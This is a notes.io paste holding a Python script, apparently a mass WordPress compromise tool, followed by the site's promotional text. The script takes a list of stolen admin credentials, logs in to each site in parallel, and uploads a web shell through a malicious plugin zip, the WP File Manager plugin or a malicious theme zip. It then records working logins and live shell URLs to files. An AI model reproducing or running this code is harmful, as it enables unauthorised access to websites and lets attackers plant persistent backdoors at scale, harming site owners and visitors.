NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

import requests, re, sys, os, string, random
from colorama import Fore
from colorama import init
from multiprocessing.dummy import Pool

init(autoreset=True)
requests.packages.urllib3.disable_warnings()
fr = Fore.RED
fw = Fore.WHITE
fg = Fore.GREEN

headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'www.google.com'}

def file_get_contents_Fox(filename):
with open(filename, 'r', encoding='utf-8') as f:
return f.read()

def random_Fox(length):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))

def URL_FOX(site):
site = str(site)
if (site.startswith('http://')) : site = site.replace('http://', ''); p = 'http://'
elif (site.startswith('https://')) : site = site.replace('https://', ''); p = 'https://'
else : p = 'http://'
if ('/' in site): site = site.rstrip().split('/')[0]
return '{}{}'.format(p, site)

def input_Fox(txt):
try :
if (sys.version_info[0] < 3): return raw_input(txt).strip()
else :
sys.stdout.write(txt)
return input().strip()
except:
pass

def URL_P(panel):
try:
admins = ['/wp-login.php', '/admin', '/user']
for admin in admins:
if (str(admin) in str(panel)): return re.findall(re.compile('(.*){}'.format(admin)), panel)[0]
return str(panel).decode('utf8')
except:
return str(panel)

def content_Fox(req):
if (sys.version_info[0] < 3):
try:
try: return str(req.content)
except:
try: return str(req.content.encode('utf-8'))
except: return str(req.content.decode('utf-8'))
except: return str(req.text)
else:
try:
try: return str(req.content.decode('utf-8'))
except:
try: return str(req.content.encode('utf-8'))
except: return str(req.text)
except: return str(req.content)

def requestG_Fox(url, typ, timeout = 20):
try:
timeout2 = timeout + 10
try: check = requests.get(url, headers=headers, verify=False, timeout=timeout)
except: check = requests.get(url, headers=headers, verify=False, timeout=timeout2)
if ( typ == 1 ) : return content_Fox(check)
else: return check
except:
return False

def requestP_Fox(url, typ, post, timeout = 20):
try:
timeout2 = timeout + 10
try: check = requests.post(url, data=post, headers=headers, verify=False, timeout=timeout)
except: check = requests.post(url, data=post, headers=headers, verify=False, timeout=timeout2)
if ( typ == 1 ) : return content_Fox(check)
else: return check
except :
return False

def randomPluginWP_Fox(url, cookies):
try:
foldername = random_Fox(7)
try:plugin_install_php = content_Fox(cookies.get('{}/wp-admin/plugin-install.php?tab=upload'.format(url), headers=headers, timeout=15))
except: plugin_install_php = content_Fox(cookies.get('{}/wp-admin/plugin-install.php?tab=upload'.format(url), headers=headers, verify=False, timeout=10))
if (not re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), plugin_install_php)): return 'F'
ID_wp = re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), plugin_install_php)[0]
if ('"' in ID_wp): ID_wp = ID_wp.split('"')[0]
filedata_Fox = {'_wpnonce': ID_wp, '_wp_http_referer': '/wp-admin/plugin-install.php?tab=upload', 'install-plugin-submit': 'Install Now'}
fileup_Fox = {'pluginzip': ('{}.zip'.format(foldername), open('Files/plugin.zip', 'rb'), 'multipart/form-data')}
try: upload = cookies.post('{}/wp-admin/update.php?action=upload-plugin'.format(url), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=60)
except: upload = cookies.post('{}/wp-admin/update.php?action=upload-plugin'.format(url), data=filedata_Fox, files=fileup_Fox, headers=headers, verify=False, timeout=60)
shellname = '{}/wp-content/plugins/{}/index.php'.format(url, foldername)
check = requestG_Fox(shellname, 1)
if ('X-Sec' in check): return shellname
return 'F'
except:
return 'F'

def wp_file_manager_Fox(domain, cookies) :
try :
filename = '{}.php'.format(random_Fox(8))
shell = file_get_contents_Fox('Files/index.php')
try: getID = content_Fox(cookies.get('{}/wp-admin/plugin-install.php?s=File+Manager&tab=search&type=term'.format(domain), verify=False, headers=headers, timeout=15))
except: getID = content_Fox(cookies.get('{}/wp-admin/plugin-install.php?s=File+Manager&tab=search&type=term'.format(domain), verify=False, headers=headers, timeout=10))
if ('admin.php?page=wp_file_manager' in getID) :
try: getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=15))
except: getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=10))
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID_wp = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
if ('"' in ID_wp): ID_wp = ID_wp.split('"')[0]
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID_wp, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw'}
try : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=60)
except : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_UP = requestG_Fox('{}/{}'.format(domain, filename), 1)
if ('X-Sec' in check_UP) : return'{}/{}'.format(domain, filename)
elif ((re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), getID) or re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID) or re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), getID))) :
if (re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), getID)) : ID_wp = re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), getID)[0]
elif (re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID)) : ID_wp = re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), getID)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), getID)) : ID_wp = re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), getID)[0][0]
try: install = cookies.get('{}/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=45)
except: install = cookies.get('{}/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=30)
try : getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=15))
except : getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=10))
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID_wp = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
if ('"' in ID_wp): ID_wp = ID_wp.split('"')[0]
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID_wp, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw'}
try : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=60)
except : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_UP = requestG_Fox('{}/{}'.format(domain,filename), 1)
if ('X-Sec' in check_UP) : return '{}/{}'.format(domain, filename)
elif (re.findall(re.compile('?action=upgrade-plugin&#038;plugin=wp-file-manager%2Ffile_folder_manager.php&#038;_wpnonce=(.*)" aria-label="(.*)" data-name="'), getID)):
ID_wp = re.findall(re.compile('?action=upgrade-plugin&#038;plugin=wp-file-manager%2Ffile_folder_manager.php&#038;_wpnonce=(.*)" aria-label="(.*)" data-name="'), getID)[0][0]
try: upgrade = content_Fox(cookies.get('{}/wp-admin/update.php?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=45))
except: upgrade = content_Fox(cookies.get('{}/wp-admin/update.php?action=upgrade-plugin&plugin=wp-file-manager%2Ffile_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=30))
if ((re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), upgrade) or re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade) or re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), upgrade))) :
if (re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), upgrade)) : ID_wp = re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), upgrade)[0]
elif (re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade)) : ID_wp = re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), upgrade)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), upgrade)) : ID_wp = re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), upgrade)[0][0]
try: install = cookies.get('{}/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=45)
except: install = cookies.get('{}/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=30)
try: getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=15))
except: getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=10))
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID_wp = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
if ('"' in ID_wp): ID_wp = ID_wp.split('"')[0]
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID_wp, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw'}
try : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=60)
except : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_UP = requestG_Fox('{}/{}'.format(domain,filename), 1)
if ('X-Sec' in check_UP): return '{}/{}'.format(domain, filename)
elif (re.findall(re.compile('wp-file-manager&#038;_wpnonce=(.*)" aria-label="(.*)" data-name='),getID)) :
ID_wp = re.findall(re.compile('wp-file-manager&#038;_wpnonce=(.*)" aria-label="(.*)" data-name='),getID)[0][0]
try : donwload = content_Fox(cookies.get('{}/wp-admin/update.php?action=install-plugin&plugin=wp-file-manager&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=45))
except : donwload = content_Fox(cookies.get('{}/wp-admin/update.php?action=install-plugin&plugin=wp-file-manager&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=30))
if ((re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), donwload) or re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload) or re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), donwload))) :
if (re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), donwload)) : ID_wp = re.findall(re.compile('plugins.php?_wpnonce=(.*)&#038;action=activate&#038;plugin=wp-file-manager'), donwload)[0]
elif (re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload)) : ID_wp = re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" target="_parent">(.*)</a> <a'), donwload)[0][0]
elif (re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), donwload)) : ID_wp = re.findall(re.compile('file_folder_manager.php&amp;_wpnonce=(.*)" >(.*)</a> <a'), donwload)[0][0]
try: install = cookies.get('{}/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=45)
except: install = cookies.get('{}/wp-admin/plugins.php?action=activate&plugin=wp-file-manager/file_folder_manager.php&_wpnonce={}'.format(domain, ID_wp), verify=False, headers=headers, timeout=30)
try: getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=15))
except: getID = content_Fox(cookies.get('{}/wp-admin/admin.php?page=wp_file_manager#elf_l1_Lw'.format(domain), verify=False, headers=headers, timeout=10))
if (re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)) :
ID_wp = re.findall(re.compile('admin-ajax.php","nonce":"(.*)","lang"'), getID)[0]
if ('"' in ID_wp): ID_wp = ID_wp.split('"')[0]
fileup_Fox = {'upload[]': (filename, shell, 'multipart/form-data')}
filedata_Fox = {'_wpnonce': ID_wp, 'action': 'mk_file_folder_manager', 'cmd': 'upload', 'target': 'l1_Lw'}
try : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=60)
except : up_Fox = cookies.post('{}/wp-admin/admin-ajax.php'.format(domain), data=filedata_Fox, files=fileup_Fox, verify=False, headers=headers, timeout=45)
check_UP = requestG_Fox('{}/{}'.format(domain,filename), 1)
if ('X-Sec' in check_UP): return '{}/{}'.format(domain, filename)
return 'F'
except:
return 'F'

def randomThemeWP_Fox(url, cookies) :
try:
foldername = random_Fox(7)
try: theme_install_php = content_Fox(cookies.get('{}/wp-admin/theme-install.php?tab=upload'.format(url), headers=headers, timeout=15))
except: theme_install_php = content_Fox(cookies.get('{}/wp-admin/theme-install.php?tab=upload'.format(url), headers=headers, verify=False, timeout=10))
if (not re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), theme_install_php)): return 'F'
ID_wp = re.findall(re.compile('id="_wpnonce" name="_wpnonce" value="(.*)"'), theme_install_php)[0]
if ('"' in ID_wp): ID_wp = ID_wp.split('"')[0]
filedata_Fox = {'_wpnonce': ID_wp, '_wp_http_referer': '/wp-admin/theme-install.php?tab=upload', 'install-theme-submit': 'Installer'}
fileup_Fox = {'themezip': ('{}.zip'.format(foldername), open('Files/theme.zip', 'rb'), 'multipart/form-data')}
try: upload_Fox = cookies.post('{}/wp-admin/update.php?action=upload-theme'.format(url), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=60)
except: upload_Fox = cookies.post('{}/wp-admin/update.php?action=upload-theme'.format(url), data=filedata_Fox, files=fileup_Fox, headers=headers, verify=False, timeout=90)
shellname = '{}/wp-content/themes/{}/about.php'.format(url, foldername)
check = requestG_Fox(shellname, 1)
if ('X-Sec' in check): return shellname
return 'F'
except:
return 'F'

def WP_Login_UPer(url, username, password):
try:
while (url[-1] == '/'): url = url[:-1]
reqFox = requests.session()
headersLogin = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': '{}/wp-admin/'.format(url)}
loginPost_Fox = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '{}/wp-admin/'.format(url)}
try: login_Fox = reqFox.post('{}/wp-login.php'.format(url), data=loginPost_Fox, headers=headersLogin, verify=False, timeout=30)
except: login_Fox = reqFox.post('{}/wp-login.php'.format(url), data=loginPost_Fox, headers=headersLogin, verify=False, timeout=15)
if (URL_FOX(login_Fox.url) != URL_FOX(url)):
url = URL_P(login_Fox.url)
reqFox = requests.session()
loginPost_Fox = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '{}/wp-admin/'.format(url)}
try: login_Fox = reqFox.post('{}/wp-login.php'.format(url), data=loginPost_Fox, headers=headersLogin, verify=False, timeout=30)
except: login_Fox = reqFox.post('{}/wp-login.php'.format(url), data=loginPost_Fox, headers=headersLogin, verify=False, timeout=15)
login_Fox = content_Fox(login_Fox)
if ('profile/login' in login_Fox):
id_wp = re.findall(re.compile('type="hidden" name="force_redirect_uri-(.*)" id='), login_Fox)[0]
myuserpro = re.findall(re.compile('name="_myuserpro_nonce" value="(.*)" /><input type="hidden" name="_wp_http_referer"'), login_Fox)[0]
loginPost_Fox = {'template': 'login', 'unique_id': '{}'.format(id_wp), 'up_username': '0', 'user_action': '',
'_myuserpro_nonce': myuserpro, '_wp_http_referer': '/profile/login/',
'action': 'userpro_process_form',
'force_redirect_uri-{}'.format(id_wp): '0', 'group': 'default',
'redirect_uri-{}'.format(id_wp): '', 'shortcode': '',
'user_pass-{}'.format(id_wp): password, 'username_or_email-{}'.format(id_wp): username}
try: login_Fox = reqFox.post('{}/wp-admin/admin-ajax.php'.format(url), data=loginPost_Fox, headers=headersLogin, verify=False, timeout=30)
except: login_Fox = reqFox.post('{}/wp-admin/admin-ajax.php'.format(url), data=loginPost_Fox, headers=headersLogin, verify=False, timeout=15)
try: check = content_Fox(reqFox.get('{}/wp-admin/'.format(url), headers=headers, verify=False, timeout=30))
except: check = content_Fox(reqFox.get('{}/wp-admin/'.format(url), headers=headers, verify=False, timeout=15))
if ('profile.php' in check or 'confirm_admin_email' in check or 'admin-email-confirm-form' in check or 'upgrade.php' in check):
open('Successfully_logged_WordPress.txt', 'a').write('{}/wp-login.php#{}@{}n'.format(url, username, password))
print(' -| {}{} -> Succeeded Login.'.format(url, fg))
if ('upgrade.php' in check):
try: reqFox.get('{}/wp-admin/upgrade.php?step=1'.format(url), headers=headers, verify=False, timeout=30)
except: reqFox.get('{}/wp-admin/upgrade.php?step=1'.format(url), headers=headers, verify=False, timeout=15)
newShell = randomPluginWP_Fox(url, reqFox)
if (newShell == 'F'): newShell = wp_file_manager_Fox(url, reqFox)
if (newShell == 'F'): newShell = randomThemeWP_Fox(url, reqFox)
if (newShell != 'F'):
print (' -| {} --> {}[Shell]'.format(newShell, fg))
open('Shells.txt', 'a').write('{}n'.format(newShell))
else: print(' -| {}{} -> Login Failed.'.format(url, fr)); return False
except :
print(' -| {}{} -> Time out.'.format(url, fr)); return False

def data_PL_Filter(panel):
try:
user = panel.split('#')[1].split('@')[0]
pswd = re.findall(re.compile('#{}(.*)'.format(user)), panel)[0][1:]
return user, pswd
except:
return False

def login(panel):
try:
if ('/wp-login.php' not in panel): return False
data = data_PL_Filter(panel)
if (data is False): return False
WP_Login_UPer(URL_P(panel), data[0], data[1])
except:
return False

def mylist():
try:
try:
with open(sys.argv[1], 'r', encoding='utf-8') as target:
return target.readlines()
except:
yList = str(input_Fox(' Your List --> : '))
if (not os.path.isfile(yList) and '.txt' not in yList):
yList = '{}.txt'.format(yList)
while (not os.path.isfile(yList)):
print("n {}({}) File does not exist, You have to put your list in the same folder.n".format(fr, yList))
yList = str(input_Fox(' Your List --> : '))
with open(yList, 'r', encoding='utf-8') as target:
return target.readlines()
except:
return False

mp = Pool(15)
mp.map(login, mylist())
     
 
what is notes.io
 

Notes is a web-based application for online taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000+ notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 14 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.